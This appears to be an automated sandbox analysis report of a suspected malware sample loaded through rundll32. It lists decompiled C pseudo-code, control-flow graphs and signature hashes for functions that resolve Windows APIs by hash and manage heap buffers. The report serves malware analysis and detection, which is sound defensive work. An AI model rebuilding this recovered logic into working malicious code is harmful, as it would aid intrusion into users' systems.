                          				E000001F71F71CC0240C(0, _t157, _t9 + _t188, _t192, _t193);
                          				if (_t152 == _t157) goto 0x1cc01cdd;
                          				bpl = _t65 - 0x4a75e5e7 + 2 == 8;
                          				_a8 = 0;
                          				goto 0x1cc01ceb;
                          				E000001F71F71CC0908C(0x8d72aad2, _t152,  *((intOrPtr*)(_t214 + 0x10)));
                          				if (_t152 == _t157) goto 0x1cc01d09;
                          				 *_t152();
                          				if (_t152 == _t157) goto 0x1cc01ed1;
                          				_t23 =  &_v104; // 0x2
                          				r9d = 0;
                          				r8d = r13d;
                          				_v112 = _t23;
                          				_t25 =  &_v88; // 0x12
                          				_t189 = _a16;
                          				_v120 = _t25;
                          				_t27 =  &_v80; // 0x1a
                          				_t155 = _t27;
                          				_v128 = _t155;
                          				_v136 = 0;
                          				if (E000001F71F71CC05168(_t157, _t193, _t189, _t203) != 0) goto 0x1cc01ec1;
                          				_t213 =  *0x1cc0d458;
                          				E000001F71F71CC0908C(0x4a75e5e7, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                          				if (_t155 == _t157) goto 0x1cc01d77;
                          				 *_t155();
                          				if ( *((intOrPtr*)(_t193 + 0x18)) == _t157) goto 0x1cc01d8c;
                          				E000001F71F71CC0240C(0, _t157,  *((intOrPtr*)(_t193 + 0x18)), _t192, _t193);
                          				goto 0x1cc01d94;
                          				E000001F71F71CC0908C(0x8d72aad2, _t155,  *((intOrPtr*)(_t213 + 0x10)));
                          				if (_t155 == _t157) goto 0x1cc01dad;
                          				 *_t155();
                          				if (_a8 == _t157) goto 0x1cc01ea1;
                          				E000001F71F71CC0908C(0xfb849f8f, _t155,  *((intOrPtr*)(_t214 + 0x18)));
                          				if (_t155 == _t157) goto 0x1cc01dd5;
                          				r14d =  *_t155();
                          				goto 0x1cc01dd8;
                          				r14d = 0;
                          				E000001F71F71CC0908C(0xfb849f8f, _t155,  *((intOrPtr*)(_v72 + 0x18)));
                          				if (_t155 == _t157) goto 0x1cc01df7;
                          				r13d =  *_t155();
                          				goto 0x1cc01dfa;
                          				r13d = 0;
                          				_t40 = _t214 + 2; // 0x2
                          				E000001F71F71CC0240C(_t213 + _t40, _t157, _t152, _t192, _a8);
                          				if (_t155 == _t157) goto 0x1cc01e93;
                          				_t41 = _t213 + 1; // 0x1
                          				r8d = _t41;
                          				 *((char*)(_t189 + _t155)) = 0x2f;
                          				0x1cc047b0();
                          				_v112 = 0 | _a8 != 0x00000000 | 0x00000002;
                          				_v120 = _a48;
                          				_v128 = _a40;
                          				_v136 = _v104;
                          				if (E000001F71F71CC06518(_a40, _v96, _t155, _t192, _a8, _t155, _v80, _v88) != 0x10d2) goto 0x1cc01e85;
                          				asm("sbb eax, eax");
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				goto 0x1cc01ed6;
                          				return 8;
                          			}





























                          0x1f71cc01bfc
                          0x1f71cc01bfc
                          0x1f71cc01bfc
                          0x1f71cc01c01
                          0x1f71cc01c15
                          0x1f71cc01c1f
                          0x1f71cc01c28
                          0x1f71cc01c2e
                          0x1f71cc01c31
                          0x1f71cc01c36
                          0x1f71cc01c41
                          0x1f71cc01c45
                          0x1f71cc01c53
                          0x1f71cc01c5b
                          0x1f71cc01c5d
                          0x1f71cc01c61
                          0x1f71cc01c67
                          0x1f71cc01c6d
                          0x1f71cc01c75
                          0x1f71cc01c7c
                          0x1f71cc01c80
                          0x1f71cc01c85
                          0x1f71cc01c8a
                          0x1f71cc01c8e
                          0x1f71cc01c92
                          0x1f71cc01c94
                          0x1f71cc01c9a
                          0x1f71cc01ca0
                          0x1f71cc01ca6
                          0x1f71cc01cb6
                          0x1f71cc01cc1
                          0x1f71cc01cc8
                          0x1f71cc01ccc
                          0x1f71cc01cdb
                          0x1f71cc01cf4
                          0x1f71cc01cfc
                          0x1f71cc01d07
                          0x1f71cc01d0c
                          0x1f71cc01d12
                          0x1f71cc01d17
                          0x1f71cc01d1a
                          0x1f71cc01d1d
                          0x1f71cc01d22
                          0x1f71cc01d27
                          0x1f71cc01d2a
                          0x1f71cc01d2f
                          0x1f71cc01d2f
                          0x1f71cc01d37
                          0x1f71cc01d3c
                          0x1f71cc01d49
                          0x1f71cc01d4f
                          0x1f71cc01d67
                          0x1f71cc01d6f
                          0x1f71cc01d75
                          0x1f71cc01d7e
                          0x1f71cc01d82
                          0x1f71cc01d8a
                          0x1f71cc01d9d
                          0x1f71cc01da5
                          0x1f71cc01dab
                          0x1f71cc01db0
                          0x1f71cc01dc1
                          0x1f71cc01dc9
                          0x1f71cc01dd0
                          0x1f71cc01dd3
                          0x1f71cc01dd5
                          0x1f71cc01de3
                          0x1f71cc01deb
                          0x1f71cc01df2
                          0x1f71cc01df5
                          0x1f71cc01df7
                          0x1f71cc01dfa
                          0x1f71cc01e02
                          0x1f71cc01e0d
                          0x1f71cc01e16
                          0x1f71cc01e16
                          0x1f71cc01e1f
                          0x1f71cc01e26
                          0x1f71cc01e52
                          0x1f71cc01e5e
                          0x1f71cc01e67
                          0x1f71cc01e6c
                          0x1f71cc01e7c
                          0x1f71cc01e81
                          0x1f71cc01e8d
                          0x1f71cc01e9b
                          0x1f71cc01eab
                          0x1f71cc01ebb
                          0x1f71cc01ec9
                          0x1f71cc01ecf
                          0x1f71cc01eef

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap$ErrorLast
                          • String ID: uJ$uJ
                          • API String ID: 2332451156-3171342107
                          • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                          • Instruction ID: 75088a54d90f28af373b6a7fe3d261395b1197fd178eb9ae27354ce7f89450dc
                          • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                          • Instruction Fuzzy Hash: F281703A70CF8186FB60DFE6A4542FEA7A1B7C9B84F584435DA8E43795DE38C8598700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 19%
                          			E000001F71F71CC0A238(void* __ecx, void* __edi, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
                          				char _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t41;
                          				void* _t43;
                          				long long* _t82;
                          				long long _t83;
                          				long long _t84;
                          				intOrPtr _t108;
                          				void* _t109;
                          				intOrPtr _t110;
                          				void* _t112;
                          				void* _t115;
                          				long long* _t118;
                          				void* _t130;
                          				long _t133;
                          				void* _t134;
                          				long _t136;
                          				void* _t139;
                          
                          				_t84 = __rbx;
                          				_t82 = _t118;
                          				 *((long long*)(_t82 + 8)) = __rbx;
                          				 *((long long*)(_t82 + 0x18)) = __r8;
                          				_t3 = _t82 + 0x20; // 0xfb849fa7
                          				_t134 = __rcx;
                          				E000001F71F71CC024B0(__rbx, _t3, _t112);
                          				if (_t82 == 0) goto 0x1cc0a3dc;
                          				E000001F71F71CC0908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t82 == 0) goto 0x1cc0a29f;
                          				_v88 =  *_t82();
                          				goto 0x1cc0a2a5;
                          				_v88 = 0;
                          				_t10 = _t82 + 1; // 0x1
                          				r8d = _t109 + _t10;
                          				HeapAlloc(_t139, _t136, _t133);
                          				_v80 = _t82;
                          				if (_t82 == 0) goto 0x1cc0a3ce;
                          				0x1cc047b0();
                          				_t13 = _t109 + 1; // 0x1
                          				r8d = _t13;
                          				0x1cc047b0();
                          				E000001F71F71CC0908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t82 == 0) goto 0x1cc0a30d;
                          				 *_t82();
                          				goto 0x1cc0a30f;
                          				_t16 =  &_a32; // 0xfb84a007
                          				_t17 =  &_v72; // 0xfb849f9f
                          				r8d = 0;
                          				_v104 = _t16;
                          				_t41 = E000001F71F71CC07CF4(_t82, _t84, _t134, _t82,  *((intOrPtr*)( *0x1cc0d458 + 8)), _t17, _t130, _t109);
                          				HeapFree(??, ??, ??);
                          				if (_t41 != 0) goto 0x1cc0a3ce;
                          				r8d = _a32;
                          				_t108 = _v72;
                          				_t21 =  &_v88; // 0xfb849f8f
                          				_t83 = _t21;
                          				_t22 =  &_v80; // 0xfb849f87
                          				_v104 = _t83;
                          				_t43 = E000001F71F71CC052B8(_t84, _t108, _t82,  *((intOrPtr*)( *0x1cc0d458 + 8)), _t22, _t112, _t115);
                          				_t110 = _v80;
                          				if (_v88 == 0) goto 0x1cc0a389;
                          				if ( *((char*)(_t108 + _t110)) != 0x3d) goto 0x1cc0a389;
                          				if (_t134 - 1 != 0) goto 0x1cc0a37a;
                          				 *((char*)(_t83 + _t110)) = 0;
                          				if (_t43 != 0) goto 0x1cc0a3b0;
                          				E000001F71F71CC07500(_t84, _t110, _t108, _t110, _t82,  *((intOrPtr*)( *0x1cc0d458 + 8)));
                          				if (_t83 != 0) goto 0x1cc0a3a5;
                          				_t29 = _t83 + 8; // 0x8
                          				goto 0x1cc0a3b0;
                          				 *_a24 = _t83;
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				return _t29;
                          			}


























                          0x1f71cc0a238
                          0x1f71cc0a238
                          0x1f71cc0a23b
                          0x1f71cc0a23f
                          0x1f71cc0a25c
                          0x1f71cc0a265
                          0x1f71cc0a26d
                          0x1f71cc0a278
                          0x1f71cc0a288
                          0x1f71cc0a290
                          0x1f71cc0a299
                          0x1f71cc0a29d
                          0x1f71cc0a2a1
                          0x1f71cc0a2b1
                          0x1f71cc0a2b1
                          0x1f71cc0a2b6
                          0x1f71cc0a2bf
                          0x1f71cc0a2c7
                          0x1f71cc0a2dd
                          0x1f71cc0a2e2
                          0x1f71cc0a2e2
                          0x1f71cc0a2ed
                          0x1f71cc0a2fc
                          0x1f71cc0a304
                          0x1f71cc0a309
                          0x1f71cc0a30b
                          0x1f71cc0a30f
                          0x1f71cc0a317
                          0x1f71cc0a31c
                          0x1f71cc0a31f
                          0x1f71cc0a32a
                          0x1f71cc0a339
                          0x1f71cc0a341
                          0x1f71cc0a347
                          0x1f71cc0a34f
                          0x1f71cc0a354
                          0x1f71cc0a354
                          0x1f71cc0a359
                          0x1f71cc0a361
                          0x1f71cc0a366
                          0x1f71cc0a36f
                          0x1f71cc0a378
                          0x1f71cc0a381
                          0x1f71cc0a387
                          0x1f71cc0a38b
                          0x1f71cc0a391
                          0x1f71cc0a396
                          0x1f71cc0a39e
                          0x1f71cc0a3a0
                          0x1f71cc0a3a3
                          0x1f71cc0a3ad
                          0x1f71cc0a3b8
                          0x1f71cc0a3c8
                          0x1f71cc0a3d6
                          0x1f71cc0a3f5

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID:
                          • API String ID: 1659099196-0
                          • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                          • Instruction ID: 410d13d81fa6db35c6a01bf9425866e29625b03ec4c67f8ff2be78cb66993868
                          • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                          • Instruction Fuzzy Hash: 12414D3930CB8296FB54DF9AA4407EA6791EBC9BC4F0441359E4E43785DE38C919CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 648 1f71cc02dc4-1f71cc02e0e 649 1f71cc02e13 call 1f71cc04320 648->649 650 1f71cc02e18-1f71cc02e1a 649->650 651 1f71cc02e29-1f71cc02e2e 650->651 652 1f71cc02e1c-1f71cc02e27 650->652 653 1f71cc02e34-1f71cc02e44 651->653 652->653 654 1f71cc02e47 call 1f71cc04880 653->654 655 1f71cc02e4c-1f71cc02e50 654->655 656 1f71cc02f94-1f71cc02f9a 655->656 657 1f71cc02e56-1f71cc02e6c 655->657 658 1f71cc02f9c-1f71cc02faa call 1f71cc047b8 656->658 659 1f71cc02fc2 656->659 660 1f71cc02e8d-1f71cc02ee8 call 1f71cc01bfc HeapFree 657->660 661 1f71cc02e6e-1f71cc02e88 657->661 670 1f71cc02faf-1f71cc02fb1 658->670 663 1f71cc02fc7 659->663 668 1f71cc02eea-1f71cc02eec 660->668 669 1f71cc02f01-1f71cc02f03 660->669 661->660 666 1f71cc02fcd-1f71cc02fd1 663->666 671 1f71cc0302f-1f71cc03032 666->671 672 1f71cc02fd3-1f71cc02fe4 call 1f71cc0908c 666->672 673 1f71cc02eee-1f71cc02ef4 668->673 674 1f71cc02ef6-1f71cc02efc call 1f71cc0a3f8 668->674 669->656 676 1f71cc02f09-1f71cc02f46 call 1f71cc06c1c call 1f71cc07b6c 669->676 670->666 675 1f71cc02fb3-1f71cc02fc0 670->675 677 1f71cc0308e-1f71cc030a0 671->677 678 1f71cc03034-1f71cc03044 HeapFree 671->678 687 1f71cc02fed-1f71cc02ff0 672->687 688 1f71cc02fe6 672->688 673->669 673->674 674->669 675->666 698 1f71cc02f48-1f71cc02f6d 676->698 699 1f71cc02f71-1f71cc02f92 HeapFree call 1f71cc047b8 676->699 682 1f71cc0304e-1f71cc0305f call 1f71cc0908c 678->682 683 1f71cc03046-1f71cc0304c 678->683 694 1f71cc03067-1f71cc03086 call 1f71cc0908c 682->694 695 1f71cc03061 682->695 683->677 683->682 691 1f71cc0301c-1f71cc0302b 687->691 692 1f71cc02ff2-1f71cc02ffb 687->692 688->687 691->671 692->691 696 1f71cc02ffd-1f71cc0300d call 1f71cc047b8 692->696 694->677 707 1f71cc03088 694->707 695->694 696->691 705 1f71cc0300f-1f71cc03017 696->705 698->666 702 1f71cc02f6f 698->702 699->670 702->663 705->691 707->677
                          C-Code - Quality: 41%
                          			E000001F71F71CC02DC4(void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                          				intOrPtr _v88;
                          				void* _v96;
                          				void* _v104;
                          				long long _v112;
                          				signed int _v120;
                          				long long _v128;
                          				long long _v136;
                          				void* __rbx;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t72;
                          				signed int _t80;
                          				void* _t81;
                          				void* _t97;
                          				signed int _t98;
                          				void* _t99;
                          				void* _t114;
                          				long long* _t139;
                          				signed long long _t140;
                          				long long* _t142;
                          				void* _t143;
                          				void* _t169;
                          				void* _t170;
                          				void* _t172;
                          				signed int _t173;
                          				long _t177;
                          				void* _t179;
                          				void* _t190;
                          				void* _t191;
                          				void* _t192;
                          				signed int* _t193;
                          				long long _t194;
                          				void* _t200;
                          				long _t202;
                          				void* _t205;
                          
                          				_t191 = _t179;
                          				 *((long long*)(_t191 + 0x18)) = __r8;
                          				 *((long long*)(_t191 + 0x10)) = __rdx;
                          				_t203 =  *0x1cc0d458;
                          				 *(_t191 + 0x20) =  *(_t191 + 0x20) & 0x00000000;
                          				_t170 = __rcx;
                          				_v120 =  *0x1cc0d450;
                          				r15d = 0;
                          				 *(_t191 - 0x60) =  *(_t191 - 0x60) & _t205;
                          				_v112 =  *((intOrPtr*)( *0x1cc0d458 + 8));
                          				if (E000001F71F71CC04320(_t143, __rcx, _t191 - 0x68, __rcx, _t172, _t191 + 8) == 0) goto 0x1cc02e29;
                          				_t12 = _t205 + 1; // 0x1
                          				r12d = _t12;
                          				_v104 = _t172;
                          				goto 0x1cc02e34;
                          				_t173 = _v104;
                          				r12d = 2;
                          				_t15 =  &_a32; // 0xca
                          				if (E000001F71F71CC04880(r12d, _t114,  *((intOrPtr*)( *0x1cc0d458 + 8)), _t143, _t170,  &_v96, _t15) != 0) goto 0x1cc02f94;
                          				r8d = _a32;
                          				r13d = r8d;
                          				r13d = r13d - r12d;
                          				_t193 = _v96;
                          				if (_t173 == 0) goto 0x1cc02e8d;
                          				_t72 = _a8;
                          				_t193[0xa] = 1;
                          				_t193[0x12] = _t173;
                          				_t193[0xd] = _t72;
                          				_t193[0x10] = _t72;
                          				_t25 = _t170 + 0xc0; // 0xc0
                          				r9d = 0;
                          				 *_t193 = _v120 ^ 0x62ade362;
                          				_t193[3] =  *(_t170 + 0x48);
                          				_t193[2] =  *(_t170 + 0x4c);
                          				_t30 =  &_a8; // 0xb2
                          				_v128 = _t30;
                          				_t32 =  &_v120; // 0x32
                          				_v136 = _t32;
                          				_t97 = E000001F71F71CC01BFC(_t32, _t143, _t25, _t193);
                          				HeapFree(_t205, _t202, _t200);
                          				if (r13d == 0) goto 0x1cc02f01;
                          				if (_t97 == 0) goto 0x1cc02ef6;
                          				if (_t97 != 0x10d2) goto 0x1cc02f01;
                          				E000001F71F71CC0A3F8(r13d, _t32, _t143, _t170, _t173, _t177, _t192, _t169);
                          				if (_t97 != 0) goto 0x1cc02f94;
                          				_t98 = _a8;
                          				_t194 = _v120;
                          				r13d =  *(_t170 + 0x4c);
                          				_t80 = E000001F71F71CC06C1C(_t98, _t194);
                          				_t38 =  &_a8; // 0xb2
                          				r9d = 1;
                          				 *(_t170 + 0x48) = _t98;
                          				 *(_t170 + 0x4c) = _t80;
                          				_t81 = E000001F71F71CC07B6C(_t143, _t170, _t194, _t173, _t177, _t38, _t190, _t191);
                          				_t99 = _t81;
                          				if (_t81 != 0) goto 0x1cc02f71;
                          				_t139 = _a16;
                          				 *_t139 = _t194;
                          				 *_a24 = _a8;
                          				if ( *(_t170 + 0x4c) != r13d) goto 0x1cc02fcd;
                          				goto 0x1cc02fc7;
                          				HeapFree(_t172, _t177, _t143);
                          				_t47 = _t170 + 0xc0; // 0xc0
                          				E000001F71F71CC047B8(_t99, _t139, _t143, _t47, _t177);
                          				goto 0x1cc02faf;
                          				if (_t99 == 0x10d2) goto 0x1cc02fc2;
                          				_t48 = _t170 + 0xc0; // 0xc0
                          				if (E000001F71F71CC047B8(_t99, _t139, _t143, _t48, _t177) != 0) goto 0x1cc02fcd;
                          				asm("lock or dword [edi+0xec], 0x1");
                          				goto 0x1cc02fcd;
                          				r15d = 1;
                          				if ( *((intOrPtr*)(_t170 + 0x60)) == 0) goto 0x1cc0302f;
                          				E000001F71F71CC0908C(0x9c66d81c, _t139,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t139 == 0) goto 0x1cc02fed;
                          				 *_t139();
                          				if (r15d == 0) goto 0x1cc0301c;
                          				_t140 =  *((intOrPtr*)(_t170 + 0x58));
                          				if (_v88 - _t140 <= 0) goto 0x1cc0301c;
                          				_t57 = _t170 + 0xc0; // 0xc1
                          				if (E000001F71F71CC047B8(_t99, _t140, _t143, _t57, _t177) != 0) goto 0x1cc0301c;
                          				asm("lock or dword [edi+0xec], 0x1");
                          				_t142 = _t140 * 0x23c34600 + _v88;
                          				 *((long long*)(_t170 + 0x58)) = _t142;
                          				if (_v104 == 0) goto 0x1cc0308e;
                          				HeapFree(??, ??, ??);
                          				if (_t99 == 0) goto 0x1cc0304e;
                          				if (_t99 != 0x10d2) goto 0x1cc0308e;
                          				E000001F71F71CC0908C(0x4a75e5e7, _t142,  *((intOrPtr*)( *0x1cc0d458 + 0x10)));
                          				if (_t142 == 0) goto 0x1cc03067;
                          				 *_t142();
                          				 *(_t170 + 0x98) =  *(_t170 + 0x98) & 0x00000000;
                          				 *(_t170 + 0x9c) =  *(_t170 + 0x9c) & 0x00000000;
                          				E000001F71F71CC0908C(0x8d72aad2, _t142,  *((intOrPtr*)(_t203 + 0x10)));
                          				if (_t142 == 0) goto 0x1cc0308e;
                          				 *_t142();
                          				return _t99;
                          			}







































                          0x1f71cc02dc4
                          0x1f71cc02dc7
                          0x1f71cc02dcb
                          0x1f71cc02ddf
                          0x1f71cc02de6
                          0x1f71cc02deb
                          0x1f71cc02dfc
                          0x1f71cc02e04
                          0x1f71cc02e07
                          0x1f71cc02e0e
                          0x1f71cc02e1a
                          0x1f71cc02e1e
                          0x1f71cc02e1e
                          0x1f71cc02e22
                          0x1f71cc02e27
                          0x1f71cc02e29
                          0x1f71cc02e2e
                          0x1f71cc02e34
                          0x1f71cc02e50
                          0x1f71cc02e56
                          0x1f71cc02e5e
                          0x1f71cc02e61
                          0x1f71cc02e64
                          0x1f71cc02e6c
                          0x1f71cc02e6e
                          0x1f71cc02e75
                          0x1f71cc02e7e
                          0x1f71cc02e83
                          0x1f71cc02e88
                          0x1f71cc02e91
                          0x1f71cc02e98
                          0x1f71cc02ea3
                          0x1f71cc02eaa
                          0x1f71cc02eb2
                          0x1f71cc02eb7
                          0x1f71cc02ebf
                          0x1f71cc02ec4
                          0x1f71cc02ec9
                          0x1f71cc02edd
                          0x1f71cc02edf
                          0x1f71cc02ee8
                          0x1f71cc02eec
                          0x1f71cc02ef4
                          0x1f71cc02efc
                          0x1f71cc02f03
                          0x1f71cc02f09
                          0x1f71cc02f10
                          0x1f71cc02f15
                          0x1f71cc02f1e
                          0x1f71cc02f23
                          0x1f71cc02f2b
                          0x1f71cc02f37
                          0x1f71cc02f3a
                          0x1f71cc02f3d
                          0x1f71cc02f42
                          0x1f71cc02f46
                          0x1f71cc02f48
                          0x1f71cc02f58
                          0x1f71cc02f67
                          0x1f71cc02f6d
                          0x1f71cc02f6f
                          0x1f71cc02f7e
                          0x1f71cc02f84
                          0x1f71cc02f8d
                          0x1f71cc02f92
                          0x1f71cc02f9a
                          0x1f71cc02f9c
                          0x1f71cc02fb1
                          0x1f71cc02fb3
                          0x1f71cc02fc0
                          0x1f71cc02fc7
                          0x1f71cc02fd1
                          0x1f71cc02fdc
                          0x1f71cc02fe4
                          0x1f71cc02feb
                          0x1f71cc02ff0
                          0x1f71cc02ff2
                          0x1f71cc02ffb
                          0x1f71cc02ffd
                          0x1f71cc0300d
                          0x1f71cc0300f
                          0x1f71cc03026
                          0x1f71cc0302b
                          0x1f71cc03032
                          0x1f71cc0303c
                          0x1f71cc03044
                          0x1f71cc0304c
                          0x1f71cc03057
                          0x1f71cc0305f
                          0x1f71cc03065
                          0x1f71cc03067
                          0x1f71cc0306e
                          0x1f71cc0307e
                          0x1f71cc03086
                          0x1f71cc0308c
                          0x1f71cc030a0

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc
                          • String ID: uJ
                          • API String ID: 3901518246-2850656762
                          • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                          • Instruction ID: 5db44042df81f2cbb8568267418ab760c8aa203a307ce0ed5a49fec81d68c661
                          • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                          • Instruction Fuzzy Hash: 00817D3A20DF8196FB14DF92E5447EAB3A5F788B84F144035EE4947B84DB39D869CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 708 1f71cc05ee8-1f71cc05f0d 709 1f71cc05f28-1f71cc05f2d 708->709 710 1f71cc05f0f-1f71cc05f20 call 1f71cc0908c 708->710 711 1f71cc05f48-1f71cc05f4d 709->711 712 1f71cc05f2f-1f71cc05f40 call 1f71cc0908c 709->712 710->709 722 1f71cc05f22 710->722 715 1f71cc05f68-1f71cc05f6f 711->715 716 1f71cc05f4f-1f71cc05f60 call 1f71cc0908c 711->716 712->711 723 1f71cc05f42 712->723 720 1f71cc05f7c-1f71cc05f83 715->720 721 1f71cc05f71-1f71cc05f76 HeapFree 715->721 716->715 729 1f71cc05f62 716->729 725 1f71cc05f90-1f71cc05f97 720->725 726 1f71cc05f85-1f71cc05f8a HeapFree 720->726 721->720 722->709 723->711 727 1f71cc05f99-1f71cc05f9e HeapFree 725->727 728 1f71cc05fa4-1f71cc05fab 725->728 726->725 727->728 730 1f71cc05fb8-1f71cc05fc7 728->730 731 1f71cc05fad-1f71cc05fb2 HeapFree 728->731 729->715 731->730
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap$ErrorLast
                          • String ID:
                          • API String ID: 2332451156-0
                          • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                          • Instruction ID: ef74562eec9381deadfc1022132cc59185f1ae39f7a32b759d47b8b7c6038f5a
                          • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                          • Instruction Fuzzy Hash: 33211539209F5182FB54DFA6A5403F963A1EB89BC8F5850259E49537D9CF28CCAAC300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7ff88c07b3a0-7ff88c07b3a6 1 7ff88c07b3a8-7ff88c07b3ab 0->1 2 7ff88c07b3e1-7ff88c07b538 0->2 4 7ff88c07b3ad-7ff88c07b3b0 1->4 5 7ff88c07b3d5-7ff88c07b414 call 7ff88c07b89c 1->5 8 7ff88c07b53e-7ff88c07b559 call 7ff88c07b72c 2->8 9 7ff88c07b53a-7ff88c07b53c 2->9 6 7ff88c07b3c8 __scrt_dllmain_crt_thread_attach 4->6 7 7ff88c07b3b2-7ff88c07b3b5 4->7 23 7ff88c07b41d-7ff88c07b432 call 7ff88c07b72c 5->23 24 7ff88c07b416-7ff88c07b418 5->24 13 7ff88c07b3cd-7ff88c07b3d4 6->13 11 7ff88c07b3b7-7ff88c07b3c0 7->11 12 7ff88c07b3c1-7ff88c07b3c6 call 7ff88c07b7dc 7->12 21 7ff88c07b55b-7ff88c07b560 call 7ff88c07bc0c 8->21 22 7ff88c07b565-7ff88c07b58c call 7ff88c07b858 call 7ff88c07b888 call 7ff88c07ba50 call 7ff88c07ba74 8->22 14 7ff88c07b58e-7ff88c07b59d 9->14 12->13 21->22 22->14 31 7ff88c07b43e-7ff88c07b44f call 7ff88c07b79c 23->31 32 7ff88c07b434-7ff88c07b439 call 7ff88c07bc0c 23->32 27 7ff88c07b505-7ff88c07b51a 24->27 40 7ff88c07b4b8-7ff88c07b4c2 call 7ff88c07ba50 31->40 41 7ff88c07b451-7ff88c07b48d call 7ff88c07bd54 call 7ff88c07baf0 call 7ff88c07bbb4 call 7ff88c07baf0 call 7ff88c07bbe0 call 7ff88c07d0c8 31->41 32->31 40->24 49 7ff88c07b4c8-7ff88c07b4d4 call 7ff88c07bbfc 40->49 41->40 68 7ff88c07b48f-7ff88c07b496 __scrt_dllmain_after_initialize_c 41->68 55 7ff88c07b4fa-7ff88c07b500 49->55 56 7ff88c07b4d6-7ff88c07b4e0 call 7ff88c07b9b4 49->56 55->27 56->55 62 7ff88c07b4e2-7ff88c07b4f5 call 7ff88c07bdec 56->62 62->55 68->40 69 7ff88c07b498-7ff88c07b4b5 call 7ff88c07d050 68->69 69->40
                          C-Code - Quality: 100%
                          			E00007FF87FF88C07B3A0(void* __edx) {
                          				void* _t5;
                          
                          				_t5 = __edx;
                          				if (_t5 == 0) goto 0x8c07b3e1;
                          				if (_t5 == 0) goto 0x8c07b3d5;
                          				if (_t5 == 0) goto 0x8c07b3c8;
                          				if (__edx == 1) goto 0x8c07b3c1;
                          				return 1;
                          			}




                          0x7ff88c07b3a4
                          0x7ff88c07b3a6
                          0x7ff88c07b3ab
                          0x7ff88c07b3b0
                          0x7ff88c07b3b5
                          0x7ff88c07b3c0

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 3885183344-0
